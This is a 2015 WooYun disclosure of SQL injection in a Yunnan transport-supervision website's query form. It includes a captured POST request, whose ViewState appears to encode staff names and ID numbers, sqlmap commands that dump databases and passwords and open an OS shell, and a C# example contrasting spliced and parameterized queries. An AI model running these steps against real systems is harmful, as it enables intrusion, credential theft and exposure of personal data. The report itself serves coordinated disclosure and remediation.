
Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-0136720

Title: SQL injection vulnerability in the Yunnan Provincial Department of Transportation Engineering Quality Supervision Bureau (os-shell obtained)

Vendor: Yunnan Provincial Department of Transportation Engineering Quality Supervision Bureau

Author: qglfnt

Submitted: 2015-08-27 08:38

Fixed: 2015-10-14 01:36

Disclosed: 2015-10-14 01:36

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: handed over to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-08-27: Details sent to the vendor; awaiting vendor handling
2015-08-30: CNCERT (National Internet Emergency Center) was unable to reach the affected unit; details disclosed only to the notifying body
2015-09-09: Details disclosed to core white hats and domain experts
2015-09-19: Details disclosed to regular white hats
2015-09-29: Details disclosed to intern white hats
2015-10-14: Details disclosed to the public

Summary:

The Yunnan Provincial Department of Transportation Engineering Quality Supervision Bureau has a SQL injection vulnerability (os-shell obtained).

Details:

http://**.**.**.**/Query/Per/Query_PerList.aspx
The query form on this page is vulnerable to SQL injection. The captured request:

POST /Query/Per/Query_PerList.aspx HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/Query/Per/Query_PerList.aspx
Cookie: ASP.NET_SessionId=s24vowxi5o4yiz3enn02ii1n
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 5499
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTAxNDk0NDcyMg9kFgICAQ9kFhICAw8PFgIeCEltYWdlVXJsBSAuLi8uLi9pbWFnZXMvamlhbmxpcmVueXVhbjExLmdpZmRkAgUPDxYCHwAFHS4uLy4uL2ltYWdlcy9RdWFsdFJlc3BvbnMuanBnZGQCDQ88KwALAQAPFggeCERhdGFLZXlzFgAeC18hSXRlbUNvdW50Ag8eCVBhZ2VDb3VudAImHhVfIURhdGFTb3VyY2VJdGVtQ291bnQCsARkFgJmD2QWHgICD2QWEGYPDxYCHgRUZXh0BQE2ZGQCAw8PFgIfBQUJ6JOd5pet5Y2HZGQCBA8PFgIfBQUGJm5ic3A7ZGQCBg9kFgJmDw8WAh8FBQnok53ml63ljYdkZAIHDw8WAh8FBQPnlLdkZAIIDw8WAh8FBSfkupHljZfnnIHlhazot6%2Flt6XnqIvnm5HnkIblkqjor6Llhazlj7hkZAIJDw8WAh8FBQoxOTc1LTEyLTAxZGQCCg8PFgIfBQUS5piG5piO55CG5bel5aSn5a2mZGQCAw9kFhBmDw8WAh8FBQE4ZGQCAw8PFgIfBQUJ5byg5bu65YWJZGQCBA8PFgIfBQUSNTMyNTI1MTk3NTA5MzAwMDMzZGQCBg9kFgJmDw8WAh8FBQnlvKDlu7rlhYlkZAIHDw8WAh8FBQPnlLdkZAIIDw8WAh8FBSfkupHljZfnnIHlhazot6%2Flt6XnqIvnm5HnkIblkqjor6Llhazlj7hkZAIJDw8WAh8FBQoxOTc1LTA5LTMwZGQCCg8PFgIfBQUe5LqR5Y2X5Lqk6YCa6IGM5Lia5oqA5pyv5a2m6ZmiZGQCBA9kFhBmDw8WAh8FBQIxMWRkAgMPDxYCHwUFBuacseS%2FimRkAgQPDxYCHwUFEjQyMDIyMjE5NzcxMDIwODcxMWRkAgYPZBYCZg8PFgIfBQUG5pyx5L%2BKZGQCBw8PFgIfBQUD55S3ZGQCCA8PFgIfBQUn5LqR5Y2X55yB5YWs6Lev5bel56iL55uR55CG5ZKo6K%2Bi5YWs5Y%2B4ZGQCCQ8PFgIfBQUKMTk3Ny0xMC0yMGRkAgoPDxYCHwUFFea5luWMl%2BecgeWfjuW7uuWtpuagoWRkAgUPZBYQZg8PFgIfBQUCMTJkZAIDDw8WAh8FBQnojIPlhYnpvplkZAIEDw8WAh8FBRI1MzAxMTIxOTc0MDExNzMyMTdkZAIGD2QWAmYPDxYCHwUFCeiMg%2BWFiem%2BmWRkAgcPDxYCHwUFA%2BeUt2RkAggPDxYCHwUFJ%2BS6keWNl%2BecgeWFrOi3r%2BW3peeoi%2BebkeeQhuWSqOivouWFrOWPuGRkAgkPDxYCHwUFCjE5NzQtMDEtMTdkZAIKDw8WAh8FBRXkupHljZfnnIHkuqTpgJrlrabmoKFkZAIGD2QWEGYPDxYCHwUFAjE2ZGQCAw8PFgIfBQUG6YKT5p2wZGQCBA8PFgIfBQUPNTMwMTIxNzUwMjE3MDAzZGQCBg9kFgJmDw8WAh8FBQbpgpPmnbBkZAIHDw8WAh8FBQPnlLdkZAIIDw8WAh8FBSfkupHljZfnnIHlhazot6%2Flt6XnqIvnm5HnkIblkqjor6Llhazlj7hkZAIJDw8WAh8FBQoxOTc1LTAyLTE3ZGQCCg8PFgIfBQUY5piG5piO5Ya26YeR5bel5Lia5a2m5qChZGQCBw9kFhBmDw8WAh8FBQIxN2RkAgMPDxYCHwUFCeiuuOS6muaYjGRkAgQPDxYCHwUFDzUzMDEyMzYyMDUwMjMwMWRkAgYPZBYCZg8PFgIfBQUJ6K645Lqa5piMZGQCBw8PFgIfBQUD55S3ZGQCCA8PFgIfBQUn5LqR5Y2X55yB5YWs6Lev5bel56iL55uR55CG5ZKo6K%2Bi5YWs5Y%2B4ZGQCCQ8PFgIf
BQUKMTk2Mi0wNS0wMmRkAgoPDxYCHwUFGOS6keWNl%2BW5v%2BaSreeUteinhuWkp%2BWtpmRkAggPZBYQZg8PFgIfBQUCMThkZAIDDw8WAh8FBQnlrZnoiKrmtbdkZAIEDw8WAh8FBQ8xNTIxMDQ3MDEwMjkwMzFkZAIGD2QWAmYPDxYCHwUFCeWtmeiIqua1t2RkAgcPDxYCHwUFA%2BeUt2RkAggPDxYCHwUFJ%2BS6keWNl%2BecgeWFrOi3r%2BW3peeoi%2BebkeeQhuWSqOivouWFrOWPuGRkAgkPDxYCHwUFCjE5NzAtMTAtMjlkZAIKDw8WAh8FBQzlpKnmtKXlpKflraZkZAIJD2QWEGYPDxYCHwUFAjE5ZGQCAw8PFgIfBQUJ6ZmI5piO56OKZGQCBA8PFgIfBQUSNTMwMTI4MTk4MDAzMDIxODExZGQCBg9kFgJmDw8WAh8FBQnpmYjmmI7no4pkZAIHDw8WAh8FBQPnlLdkZAIIDw8WAh8FBSfkupHljZfnnIHlhazot6%2Flt6XnqIvnm5HnkIblkqjor6Llhazlj7hkZAIJDw8WAh8FBQoxOTgwLTAzLTAyZGQCCg8PFgIfBQUe5LqR5Y2X55yB5YWs6Lev5bGA6IGM5bel5aSn5a2mZGQCCg9kFhBmDw8WAh8FBQIyMGRkAgMPDxYCHwUFBuaWuemTrWRkAgQPDxYCHwUFDzUzMjQwMTc2MTIxMDA5NWRkAgYPZBYCZg8PFgIfBQUG5pa56ZOtZGQCBw8PFgIfBQUD55S3ZGQCCA8PFgIfBQUn5LqR5Y2X55yB5YWs6Lev5bel56iL55uR55CG5ZKo6K%2Bi5YWs5Y%2B4ZGQCCQ8PFgIfBQUKMTk3Ni0xMi0xMGRkAgoPDxYCHwUFEumVv%2BaymeS6pOmAmuWtpumZomRkAgsPZBYQZg8PFgIfBQUCMjFkZAIDDw8WAh8FBQnpgpPlu7rmmI5kZAIEDw8WAh8FBQ81MzIzMDE3NjA2MjgzOTFkZAIGD2QWAmYPDxYCHwUFCemCk%2BW7uuaYjmRkAgcPDxYCHwUFA%2BeUt2RkAggPDxYCHwUFJ%2BS6keWNl%2BecgeWFrOi3r%2BW3peeoi%2BebkeeQhuWSqOivouWFrOWPuGRkAgkPDxYCHwUFCjE5NzYtMDYtMjhkZAIKDw8WAh8FBRvkupHljZfnnIHnhaTngq3lt6XkuJrlrabmoKFkZAIMD2QWEGYPDxYCHwUFAjIyZGQCAw8PFgIfBQUJ5p2O5byA5a%2BMZGQCBA8PFgIfBQUSNTMyMTAxMTk2MzA4MTYwOTExZGQCBg9kFgJmDw8WAh8FBQnmnY7lvIDlr4xkZAIHDw8WAh8FBQPnlLdkZAIIDw8WAh8FBSfkupHljZfnnIHlhazot6%2Flt6XnqIvnm5HnkIblkqjor6Llhazlj7hkZAIJDw8WAh8FBQoxOTYzLTA4LTE2ZGQCCg8PFgIfBQUY5LqR5Y2X5bm%2F5pKt55S16KeG5aSn5a2mZGQCDQ9kFhBmDw8WAh8FBQIyM2RkAgMPDxYCHwUFCeWuieazvea1t2RkAgQPDxYCHwUFDzUzMjIwMTY0MDQxNjU0M2RkAgYPZBYCZg8PFgIfBQUJ5a6J5rO95rW3ZGQCBw8PFgIfBQUD55S3ZGQCCA8PFgIfBQUn5LqR5Y2X55yB5YWs6Lev5bel56iL55uR55CG5ZKo6K%2Bi5YWs5Y%2B4ZGQCCQ8PFgIfBQUKMTk2NC0wNC0xNmRkAgoPDxYCHwUFHuilv%2BWNl%2BacieiJsuWcsOi0qOaKgOW3peWtpuagoWRkAg4PZBYQZg8PFgIfBQUCMjRkZAIDDw8WAh8FBQnmnY7liZHomblkZAIEDw8WAh8FBRI1MzAxMDMxOTgwMTAwMTM3MTBkZAIGD2QWAmYPDxYCHwUFCeadjuWJkeiZuWRkAgcPDxYCHwUFA%2BeUt2Rk
AggPDxYCHwUFJ%2BS6keWNl%2BecgeWFrOi3r%2BW3peeoi%2BebkeeQhuWSqOivouWFrOWPuGRkAgkPDxYCHwUFCjE5ODAtMTAtMDFkZAIKDw8WAh8FBRjmrabmsYnkuqTpgJrnp5HmioDlpKflraZkZAIPD2QWEGYPDxYCHwUFAjI1ZGQCAw8PFgIfBQUJ5YiY6JaH6JaHZGQCBA8PFgIfBQUPNTMwMTAyODEwODA2MDAyZGQCBg9kFgJmDw8WAh8FBQnliJjolofolodkZAIHDw8WAh8FBQPlpbNkZAIIDw8WAh8FBSfkupHljZfnnIHlhazot6%2Flt6XnqIvnm5HnkIblkqjor6Llhazlj7hkZAIJDw8WAh8FBQoxOTgxLTA4LTA2ZGQCCg8PFgIfBQUS6ZW%2F5rKZ5Lqk6YCa5a2m6ZmiZGQCEA9kFhBmDw8WAh8FBQIyNmRkAgMPDxYCHwUFCeadjuaZk%2BWNh2RkAgQPDxYCHwUFDzUzMDEyNzc0MDMxNjI3MWRkAgYPZBYCZg8PFgIfBQUJ5p2O5pmT5Y2HZGQCBw8PFgIfBQUD55S3ZGQCCA8PFgIfBQUn5LqR5Y2X55yB5YWs6Lev5bel56iL55uR55CG5ZKo6K%2Bi5YWs5Y%2B4ZGQCCQ8PFgIfBQUKMTk3NC0wMy0xNmRkAgoPDxYCHwUFEumHjeW6huS6pOmAmuWtpumZomRkAg8PDxYCHwUFAzU2MGRkAhEPDxYCHwUFBDEvMzhkZAITDw8WAh4HRW5hYmxlZGhkZAIVDw8WAh8GaGRkAhcPDxYCHwZnZGQCGQ8PFgIfBmdkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WBAUJYnRuRW1wbG95BQ5idG5TdXBlcnZTdGFmZgUOYnRuRGV0ZWN0U3RhZmYFDEltYWdlQnV0dG9uMUz5F9lsShuPq%2FCgnN6r%2Bh%2Fn%2B2DpCYCuiHsMZdFFRaku&__EVENTVALIDATION=%2FwEWKwKU7qD7DwKcppSyCQKqj5uODgLN0fyTAwK6lemnBQLSwpnTCALL%2F66NDwLiga%2BNDwKBgq%2BNDwKogK%2BNDwLHgK%2BNDwL%2Bgq%2BNDwKdg6%2BNDwLmgKPHAgKFgaPHAgKs%2F6LHAgLL%2F6LHAgLigaPHAgKBgqPHAgKogKPHAgLHgKPHAgK47MDcDALnsOecDgKCmoWyCAKJqJqcCwKkkbixBQLT1d7xBgLuvvyGAQL1zJHxAwKQtq%2BGDgKdg6fHAgK47MTcDALnsOucDgKCmomyCAKJqJ6cCwKkkbyxBQLT1eLxBgLuvoCHAQL1zJXxAwKQtrOGDgKdg5vHAgKWosD8CgL7uKJncP9d4gj0xGpfEPVBSw873fdR4SaPd9hLB8VcCsIv%2BaU%3D&txtUnitName=123&ImageButton1.x=9&ImageButton1.y=5

Proof of vulnerability:

Save the request packet as 1.txt, then:
sqlmap.py -r 1.txt -p txtUnitName --dbs

(screenshot: 20150825005548.png)


sqlmap.py -r 1.txt -p txtUnitName --passwords

(screenshot: 20150825005653.png)


sqlmap.py -r 1.txt -p txtUnitName --os-shell

(screenshot: 20150825010014.jpg)


(screenshot: 20150825005833.jpg)

Fix:

Filter the input parameters.
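As an added example that is not the reporter's or the affected site's code: the string-splicing pattern that typically makes a txtUnitName lookup injectable in an ASP.NET WebForms code-behind, next to its parameterized fix. The class, table, GridView and connection-string names are assumptions; only txtUnitName and ImageButton1 come from the captured request.

```csharp
// Added example, not code from the report or the affected site: the string-splicing
// pattern behind a bug like this beside its parameterized fix (ASP.NET WebForms).
// Query_PerList, Personnel, gvResult and "PersonnelDb" are assumptions; txtUnitName
// and ImageButton1 come from the captured request.
using System.Configuration;
using System.Data;
using System.Data.SqlClient;
using System.Web.UI;
using System.Web.UI.WebControls;
public partial class Query_PerList : Page
{
    private static readonly string ConnStr =
        ConfigurationManager.ConnectionStrings["PersonnelDb"].ConnectionString;
    // BEFORE: the form value is spliced into the SQL text, so whatever is typed
    // into txtUnitName is executed as part of the statement.
    private DataTable SearchVulnerable(string unitName)
    {
        string sql = "SELECT PerId, PerName, UnitName FROM Personnel "
                   + "WHERE UnitName LIKE '%" + unitName + "%'";
        var dt = new DataTable();
        using (var conn = new SqlConnection(ConnStr))
        using (var da = new SqlDataAdapter(sql, conn))
            da.Fill(dt);
        return dt;
    }
    // AFTER: the value travels as a typed, length-capped parameter, never as SQL
    // text, and LIKE wildcards are escaped so input cannot widen the match.
    // Pair this with a low-privilege database login, which is what confines an
    // injection to the query's own tables rather than the operating system.
    private DataTable SearchSafe(string unitName)
    {
        const string sql = "SELECT PerId, PerName, UnitName FROM Personnel "
                         + "WHERE UnitName LIKE '%' + @unit + '%'";
        string pattern = unitName.Replace("[", "[[]").Replace("%", "[%]").Replace("_", "[_]");
        var dt = new DataTable();
        using (var conn = new SqlConnection(ConnStr))
        using (var cmd = new SqlCommand(sql, conn))
        using (var da = new SqlDataAdapter(cmd))
        {
            cmd.Parameters.Add("@unit", SqlDbType.NVarChar, 100).Value = pattern;
            da.Fill(dt);
        }
        return dt;
    }
    protected void ImageButton1_Click(object sender, ImageClickEventArgs e)
    {
        gvResult.DataSource = SearchSafe(txtUnitName.Text.Trim());
        gvResult.DataBind();
    }
}
```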

Copyright notice: when reposting, please credit the source: qglfnt@WooYun


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-08-30 01:35

Vendor reply:

CNVD has confirmed and reproduced the reported issue and has forwarded it via CNCERT to the Yunnan branch center, which will coordinate handling with the website's administering unit.

Latest status:

None yet


Vulnerability evaluation:

Comments

  1. 2015-10-04 14:04 | 李叫兽就四李叫兽 ( Intern white hat | Rank:58 Vulnerabilities:23 | 啦啦啦啦)

    Give us an aspx shell, would you?